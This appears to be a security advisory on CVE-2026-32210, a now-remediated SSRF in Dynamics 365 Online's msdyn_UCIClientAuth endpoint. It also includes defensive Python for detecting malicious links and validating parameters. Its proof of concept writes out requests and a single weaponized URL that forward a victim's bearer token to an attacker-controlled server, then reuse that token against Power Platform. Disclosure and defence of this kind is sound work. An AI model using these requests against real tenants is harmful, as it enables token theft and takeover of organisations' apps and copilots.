Introduction
A single crafted URL targeting a Microsoft Dynamics 365 Online tenant could silently forward a victim's Power Platform bearer token to an attacker-controlled server, granting broad access to create, delete, and enumerate PowerApps, invoke Copilot Studio copilots, and execute AI workflows. Tracked as CVE-2026-32210 with a Critical CVSS score of 9.3, this Server-Side Request Forgery in the msdyn_UCIClientAuth OData endpoint was disclosed and simultaneously confirmed as remediated by Microsoft on April 23, 2026, as part of their cloud vulnerability transparency initiative.
Technical Information
Root Cause
The vulnerability is classified under CWE-918 (Server-Side Request Forgery). The root cause lies in the msdyn_UCIClientAuth OData function exposed by Microsoft Dynamics 365 Online. This function accepts several parameters, including EndpointEnum, RequestMethod, RequestBody, RequestHeaders, and TokenAudience. The critical flaw is that the EndpointEnum parameter accepted arbitrary, attacker-controlled URLs without adequate validation. When called, the Dynamics 365 backend issued an outbound HTTP GET request to whatever URL was supplied in EndpointEnum and, critically, forwarded the authenticated user's JWT bearer token in the Authorization header of that outbound request.
CVSS Vector Breakdown
The CVSS 3.1 vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N, which tells us:
- Attack Vector (Network): Exploitable remotely over the internet.
- Attack Complexity (Low): No special conditions or race conditions needed.
- Privileges Required (None): The attacker does not need to be authenticated to Dynamics 365; they only need the victim to be.
- User Interaction (Required): The victim must click a crafted link while holding an active Dynamics 365 session.
- Scope (Changed): The impact extends beyond Dynamics 365 itself into the broader Power Platform.
- Confidentiality and Integrity (High): The stolen token grants read and write access across Power Platform resources.
- Availability (None): No denial of service component.
Attack Flow
The exploit proceeds in distinct stages, all originating from a single HTTP GET request:
Stage 1: SSRF with Token Forwarding. The attacker crafts a URL that calls the msdyn_UCIClientAuth function with EndpointEnum set to an attacker-controlled server. When a victim with an active Dynamics 365 session navigates to this URL (via phishing email, Teams message, or any link delivery mechanism), the Dynamics 365 backend issues an outbound GET to the attacker's server. The outbound request originates from a Microsoft-owned IP address and includes the victim's JWT in the Authorization: Bearer header. In this initial configuration, the token audience is scoped to the Copilot eligibility service (https://chatuxmanager.svc.cloud.microsoft).
Stage 2: Null Audience Token Bypass. By setting @TokenAudience=null instead of a specific service URL, the attacker triggers the backend to issue a far more broadly scoped token. This second token has audience https://api.powerplatform.com and is issued under app ID 00000007-0000-0000-c000-000000000000 (Microsoft Dynamics CRM). The token carries extensive Power Platform scopes including PowerApps.Apps.Create, PowerApps.Apps.Delete, PowerApps.Apps.Play, CopilotStudio.Copilots.Invoke, AiFlows.Workflows.Execute, and others.
Stage 3: Token Use Against Power Platform. The attacker presents the stolen Power Platform token directly to the tenant's Power Platform API to perform actions such as enumerating all PowerApps in the tenant, creating or deleting apps, or invoking Copilot Studio copilots.
Single URL Weaponization. Because the entire exploit uses a plain HTTP GET with all attacker-controlled values embedded in the query string, the full attack collapses to a single crafted link. Delivery is trivial: email, Teams, or any context where a user might click a URL while authenticated to Dynamics 365.
Proof of Concept
A full, reproducible Proof of Concept was published on April 23, 2026 by Assumed Breach Research. The following stages demonstrate the exploit chain. A prerequisite is that the victim holds an authenticated Dynamics 365 session.
Stage 1: SSRF with Token Forwarding
GET /api/data/v9.0/msdyn_UCIClientAuth(
EndpointEnum=@EndpointEnum,
RequestMethod=@RequestMethod,
RequestBody=@RequestBody,
RequestHeaders=@RequestHeaders,
TokenAudience=@TokenAudience
)?@EndpointEnum='https://[attacker-controlled-server]'
&@RequestMethod='GET'
&@RequestBody=null
&@RequestHeaders=null
&@TokenAudience='https://chatuxmanager.svc.cloud.microsoft'
Host: [tenant].crm[N].dynamics.com

// Result: outbound request received at attacker server from Microsoft IP
// Authorization: Bearer [JWT — aud: copilot eligibility service]
Stage 2: Null Audience Token Bypass
GET /api/data/v9.0/msdyn_UCIClientAuth(
EndpointEnum=@EndpointEnum,
RequestMethod=@RequestMethod,
RequestBody=@RequestBody,
RequestHeaders=@RequestHeaders,
TokenAudience=@TokenAudience
)?@EndpointEnum='https://[attacker-controlled-server]'
&@RequestMethod='GET'
&@RequestBody=null
&@RequestHeaders=null
&@TokenAudience=null

// Result: second outbound request received at attacker server
// Authorization: Bearer [JWT — aud: https://api.powerplatform.com]
// scp: PowerApps.Apps.Read PowerApps.Apps.Create PowerApps.Apps.Delete
//      AiFlows.Workflows.Execute CopilotStudio.Copilots.Invoke ...
Stage 3: Token Use Against Power Platform
GET /powerapps/apps?api-version=1 HTTP/2
Host: [tenant-id].tenant.api.powerplatform.com
Authorization: Bearer [token from stage 2]

HTTP/2 200 OK
Content-Type: application/json
// Full PowerApps enumeration returned for the tenant
Single URL Weaponization:
https://[target-tenant].crm[N].dynamics.com/api/data/v9.0/msdyn_UCIClientAuth(
EndpointEnum=@EndpointEnum,
RequestMethod=@RequestMethod,
RequestBody=@RequestBody,
RequestHeaders=@RequestHeaders,
TokenAudience=@TokenAudience
)?@EndpointEnum='https://[attacker-controlled-server]'
&@RequestMethod='GET'
&@RequestBody=null
&@RequestHeaders=null
&@TokenAudience=null
If a victim with an active Dynamics 365 session follows this link, their Power Platform scoped bearer token is forwarded to the attacker's server. The vulnerability has been fully remediated server-side by Microsoft.
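Because the whole attack fits in one link, a mail or proxy filter can screen for it before a user ever clicks. The Python below is an added example, not code from the advisory or from Assumed Breach Research: it parses the OData parameter aliases of a msdyn_UCIClientAuth link and flags an EndpointEnum outside a defender-chosen trusted-host list and a null TokenAudience. The TRUSTED_ENDPOINT_SUFFIXES list and the sample links are assumptions; the hostnames in them are placeholders.

```python
from urllib.parse import parse_qs, urlparse

# Assumption: the defender fills this with the first-party host suffixes that a
# legitimate msdyn_UCIClientAuth call is expected to reach; any other host is flagged.
TRUSTED_ENDPOINT_SUFFIXES = (".dynamics.com", ".cloud.microsoft")


def _odata_literal(value):
    """Map an OData parameter-alias literal ('text' or null) to a Python value."""
    if value is None or value.strip().lower() == "null":
        return None
    return value.strip().strip("'")


def analyse_link(url: str) -> dict:
    """Classify a URL that may invoke msdyn_UCIClientAuth on a Dynamics 365 tenant."""
    u = urlparse(url)
    if "msdyn_uciclientauth(" not in u.path.lower():
        return {"relevant": False, "findings": []}
    # Parameter aliases (@Name=value) travel in the query string; compare keys case-insensitively.
    q = {k.lower(): v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    endpoint = _odata_literal(q.get("@endpointenum"))
    audience = _odata_literal(q.get("@tokenaudience"))
    host = urlparse(endpoint).hostname if endpoint else None
    findings = []
    if host and not host.endswith(TRUSTED_ENDPOINT_SUFFIXES):
        findings.append(f"EndpointEnum targets untrusted host {host}; the caller's bearer token would be sent there")
    if "@tokenaudience" in q and audience is None:
        findings.append("TokenAudience=null requests a broadly scoped Power Platform token")
    return {"relevant": True, "endpoint_host": host, "audience": audience, "findings": findings}


# Constructed sample links; tenant and collector hostnames are placeholders, not real infrastructure.
FUNCTION = ("msdyn_UCIClientAuth(EndpointEnum=@EndpointEnum,RequestMethod=@RequestMethod,"
            "RequestBody=@RequestBody,RequestHeaders=@RequestHeaders,TokenAudience=@TokenAudience)")
SAMPLE_LINKS = [
    "https://contoso.crm4.dynamics.com/api/data/v9.0/" + FUNCTION
    + "?@EndpointEnum='https://collector.attacker.example'&@RequestMethod='GET'"
    + "&@RequestBody=null&@RequestHeaders=null&@TokenAudience=null",
    "https://contoso.crm4.dynamics.com/api/data/v9.0/" + FUNCTION
    + "?@EndpointEnum='https://chatuxmanager.svc.cloud.microsoft'&@RequestMethod='GET'"
    + "&@RequestBody=null&@RequestHeaders=null&@TokenAudience='https://chatuxmanager.svc.cloud.microsoft'",
    "https://contoso.crm4.dynamics.com/main.aspx?pagetype=entitylist",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(analyse_link(link))
```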
Patch Information
Microsoft has fully remediated CVE-2026-32210 through a server-side fix deployed directly to the Dynamics 365 Online cloud infrastructure. The MSRC advisory, released on April 23, 2026, explicitly states: "This vulnerability has already been fully mitigated by Microsoft. There is no action for users of this service to take."
Because Dynamics 365 Online is a SaaS product, the patch was applied at the service level across all affected tenants. There is no downloadable security update, KB article, or specific build number associated with this fix. The Security Updates table on the MSRC page lists dashes for the Article, Download, and Build Number columns, confirming the remediation was entirely infrastructure-side.
The CVSS temporal metrics set the Remediation Level to "Official Fix," and the CVE.org record tags the MSRC advisory reference as both vendor-advisory and patch. While Microsoft has not disclosed the specific code changes, the fix likely involved tightening input validation on the EndpointEnum parameter and restricting the scope of server-side requests that the msdyn_UCIClientAuth function will process.
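Microsoft has not published the fix, so the following Python model is an added illustration of the two controls the root cause implies, not Microsoft's code: EndpointEnum is resolved from a fixed server-side table of named endpoints instead of being accepted as a URL, and a null TokenAudience is rejected instead of falling back to a broadly scoped token. The Endpoint members, ALLOWED_AUDIENCES and ALLOWED_METHODS are hypothetical.

```python
from dataclasses import dataclass
from enum import Enum


class Endpoint(Enum):
    """Hypothetical: the first-party services the function may reach.
    Callers send only a member name; a URL in the request is never honoured."""
    COPILOT_ELIGIBILITY = "https://chatuxmanager.svc.cloud.microsoft"


# Hypothetical: audiences a caller may request for each endpoint.
ALLOWED_AUDIENCES = {
    Endpoint.COPILOT_ELIGIBILITY: {"https://chatuxmanager.svc.cloud.microsoft"},
}

ALLOWED_METHODS = {"GET", "POST"}


@dataclass(frozen=True)
class OutboundRequest:
    url: str
    method: str
    audience: str  # audience of the token the backend will attach


class RejectedRequest(ValueError):
    """Raised instead of issuing any outbound request."""


def build_outbound_request(endpoint_enum, request_method, token_audience):
    """Validate the caller-influenced parameters before any request is built."""
    # Control 1: EndpointEnum must be an enumeration name, never a URL.
    if not isinstance(endpoint_enum, str) or endpoint_enum not in Endpoint.__members__:
        raise RejectedRequest("EndpointEnum is not a known endpoint name")
    endpoint = Endpoint[endpoint_enum]
    # Control 2: a null audience is rejected, never replaced by a broad default token.
    if token_audience is None:
        raise RejectedRequest("TokenAudience is required")
    if token_audience not in ALLOWED_AUDIENCES[endpoint]:
        raise RejectedRequest("TokenAudience is not permitted for this endpoint")
    method = str(request_method or "").upper()
    if method not in ALLOWED_METHODS:
        raise RejectedRequest("RequestMethod is not supported")
    return OutboundRequest(url=endpoint.value, method=method, audience=token_audience)


def rejects(endpoint_enum, request_method, token_audience) -> bool:
    """True if the validator refuses the combination."""
    try:
        build_outbound_request(endpoint_enum, request_method, token_audience)
    except RejectedRequest:
        return True
    return False
```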
This disclosure aligns with Microsoft's "Toward greater transparency: Unveiling Cloud Service CVEs" program, where vulnerabilities in cloud services are published even when the fix has already been silently deployed. No customer deployment steps are needed. The patch is fully in effect for all Dynamics 365 Online users as of the disclosure date.
Affected Systems and Versions
The vulnerability affects Microsoft Dynamics 365 (Online), the cloud-hosted SaaS deployment of the Dynamics 365 platform. Specifically, the vulnerable component is the msdyn_UCIClientAuth OData endpoint. On-premises deployments of Dynamics 365 are not referenced in the advisory.
No specific version numbers or build ranges are provided by Microsoft, which is consistent with cloud service vulnerabilities where the vendor manages all versioning internally. All Dynamics 365 Online tenants were potentially affected prior to the server-side remediation.